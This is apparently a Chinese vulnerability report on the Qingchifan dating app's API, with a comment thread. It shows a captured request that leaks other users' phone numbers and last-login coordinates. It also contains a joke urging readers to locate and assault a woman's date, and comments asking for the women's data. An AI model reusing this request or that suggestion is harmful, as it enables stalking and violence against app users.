Gozap旗下某社交平台接口控制不严泄露会员详细信息(都是妹子)

出现问题的是http://www.qingchifan.com/ 请吃饭的APP客户端。

我们注册个号看一下

居然是妹子买单，好感动。点开妹子资料看看

发现正常是无法看到更多信息的。我们抓包试试

POST /api/event/get.json?access_token=028fa5cddf7e5130dfd35344299ffbba846282C727162AC08F276736FD32C85 HTTP/1.1
 Host: api.qingchifan.com
 Proxy-Connection: keep-alive
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Accept-Language: zh-cn
 Accept: */*
 Pragma: no-cache
 Content-Length: 27
 Connection: keep-alive
 User-Agent: QingChiFan/1.2.2 CFNetwork/609.1.4 Darwin/13.0.0
 
 visitUserId=7138**

上面的7138** 便是妹子的用户ID

我们看下返回的数据

由此便得到了妹子的所有信息，包括注册时间，手机号，最后登录时间，最后登录地点经纬度。

下面，我们再看看如何查看妹子和谁约过会。

抓包后，发现返回了该用户的ID

查看他的信息

【友情小提示】看到女神被人约过，你可以利用此方法找到对方手机号以及经纬度，过去暴打他一顿。。

下面在附上一个小漏洞，可以把个人资料修改的个性一点。。

点击编辑资料后，抓包便可以发现所有个人信息都在数据包里。

通过直接更改数据包可以实现改成任意字符。

不要把所有信息都返回到客户端。

增强接口控制。

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-10-16 17:34

厂商回复：

最新状态：

2014-12-08：正在修复bug

1. 2014-08-09 22:24 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱，如果不服你TM来打我啊--哎呀...)

   0

   都是妹子，能联系下我QQ发我分么，哈哈

   1# 回复此人

2. 2014-08-10 08:35 | s3xy ( 普通白帽子 | Rank:994 漏洞数:131 | 相濡以沫，不如相忘于江湖)

   2

   @ Jn· 搞妹子多没意思。不如咱俩搞基吧。

   2# 回复此人

3. 2014-10-03 12:10 | zhxs ( 实习白帽子 | Rank:69 漏洞数:26 | 不是你不行、只是路不平ฏ๎๎๎๎๎๎๎๎...)

   1

   都是妹子？？分我几个吧 └(^o^)┘

   3# 回复此人

4. 2014-10-03 13:18 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖，不如相濡以沫)

   0

   无影响厂商忽略

   4# 回复此人

5. 2014-10-04 10:41 | 小卖部部长 ( 路人 | Rank:24 漏洞数:3 | 别拿部长不当干部！)

   0

   省饭钱了。。。

   5# 回复此人

6. 2014-10-11 19:53 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络！一个有梦想的16岁...)

   0

   哈哈，妹子~

   6# 回复此人

7. 2014-10-12 00:37 | 风花雪月 ( 实习白帽子 | Rank:67 漏洞数:49 | []+[]|[]-[][][][][]%[][]|[]/[]%[][]|[]/[...)

   0

   不发妹子信息，你就是准备受宫刑的

   7# 回复此人

8. 2014-10-16 18:59 | Neeke ( 普通白帽子 | Rank:110 漏洞数:26 | 额滴歌神呀！)

   0

   估计都是拖把

   8# 回复此人

9. 2014-10-19 14:48 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

   1

   @xsser 这个洞值多少rank

   9# 回复此人

10. 2014-10-19 14:48 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    0

    虽然忽略了 但是接口已经请求不到这些信息了

    10# 回复此人